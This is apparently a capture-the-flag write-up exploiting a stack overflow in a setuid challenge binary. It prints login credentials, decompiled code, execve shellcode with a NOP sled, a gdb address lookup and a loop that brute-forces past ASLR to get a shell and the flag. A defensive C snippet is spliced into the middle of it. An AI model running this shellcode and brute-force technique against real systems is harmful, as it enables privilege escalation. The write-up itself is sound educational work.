Category: pwnables
This time, let’s attack /opt/pctf/z2/exploitme.
ssh username@a5.amalgamated.biz
Username: z2_1
Password: 29rpJinvpwoI7pzdufQc4h6edzvyh
Summary: buffer overflow, static binary
int main(int a1, int a2)
{
  char v3; // [sp+1Ch] [bp-204h]@7   -- 0x200-byte stack buffer
  unsigned int v4; // [sp+21Ch] [bp-4h]@4  -- user-supplied length

  if ( a1 != 2 )
  {
    printf("%s requires one arguments.\n", *(_DWORD *)a2);
    exit(1);
  }
  v4 = strtoul(*(_DWORD *)(a2 + 4));
  if ( v4 > 0x1FF )
  {
    // only exits when log_error() returns non-zero; otherwise falls through
    if ( log_error((int)"[assertion] len < sizeof(buffer)") )
      myexit(2);
  }
  fgets_unlocked(&v3, v4, stdin);
  puts(&v3);
  return 0;
}
Hmm, an interesting thing: when the given size is too large, myexit(2) is called only if log_error() returns a non-zero value; otherwise the oversized length reaches fgets_unlocked() anyway. Let's check if it works:
z2_1@a5:~$ perl -e 'print "A"x1024;' | /opt/pctf/z2/exploitme 1024
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...
Segmentation fault
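The root cause is the length check that only exits when log_error() says so. As an added example (not the challenge's code), this is how the same read looks when the length is parsed strictly and rejected unconditionally before it can reach fgets; the parse_len/read_line_safe/demo names, the fmemopen-based demo harness and the constructed inputs are my own assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen/strdup */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define BUF_SIZE 0x200  /* same 512-byte stack buffer as exploitme */

/* Strict parse of the length argument: decimal digits only, no overflow,
 * and strictly smaller than the buffer. 0 on success, -1 on rejection. */
int parse_len(const char *arg, size_t *out)
{
    char *end;
    errno = 0;
    unsigned long v = strtoul(arg, &end, 10);
    if (*arg == '\0' || *end != '\0' || errno == ERANGE)
        return -1;          /* junk, trailing characters, or out of range */
    if (v == 0 || v >= BUF_SIZE)
        return -1;          /* rejected unconditionally: no log_error() detour */
    *out = (size_t)v;
    return 0;
}

/* Like fgets_unlocked(&v3, v4, stdin) in exploitme, but v4 can never exceed
 * the buffer. Returns bytes read, or -1 if the length was rejected. */
long read_line_safe(const char *lenarg, FILE *in, char *buf, size_t bufsz)
{
    size_t len;
    if (parse_len(lenarg, &len) != 0 || len >= bufsz)
        return -1;
    if (fgets(buf, (int)len, in) == NULL)
        return -1;
    return (long)strlen(buf);
}

/* Demo harness (hypothetical): feeds a constructed string as stdin. */
long demo(const char *lenarg, const char *input)
{
    char buf[BUF_SIZE];
    char *copy = strdup(input);
    FILE *in = copy ? fmemopen(copy, strlen(copy), "r") : NULL;
    if (!in) { free(copy); return -2; }
    long n = read_line_safe(lenarg, in, buf, sizeof buf);
    fclose(in);
    free(copy);
    return n;
}
```

With this check, the "1024" argument from the session above is refused before any input is read, instead of depending on log_error()'s return value.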
Yes, the buffer overflows. Let's check for NX:
smallbug2 $ execstack -q binary
X binary
Cool, the NX bit is not set, so the stack is executable. Unfortunately ASLR is enabled, but we can build a huge NOP sled and make several attempts:
z2_1@a5:~$ export SC="`perl -e 'print "\x90"x64000 . "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80";'`"
Get one of the possible addresses:
z2_1@a5:~$ perl -e 'print "A"x1024;' >input
z2_1@a5:~$ gdb /opt/pctf/z2/exploitme
(gdb) r 1024 <input
(gdb) p/x $esp+20000
$1 = 0xbfdea7b0
Run!
z2_1@a5:~$ while [ 0 ]; do (perl -e 'print "\xb0\xa7\xde\xbf"x256;'; echo; cat) | /opt/pctf/z2/exploitme 1024; done
After ~20 segfaults we get a shell:
id
uid=2000(z2_1) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)
cat /opt/pctf/z2/key
This is the key: EASTEREGGHUNTS_ARE_FUN
The flag: EASTEREGGHUNTS_ARE_FUN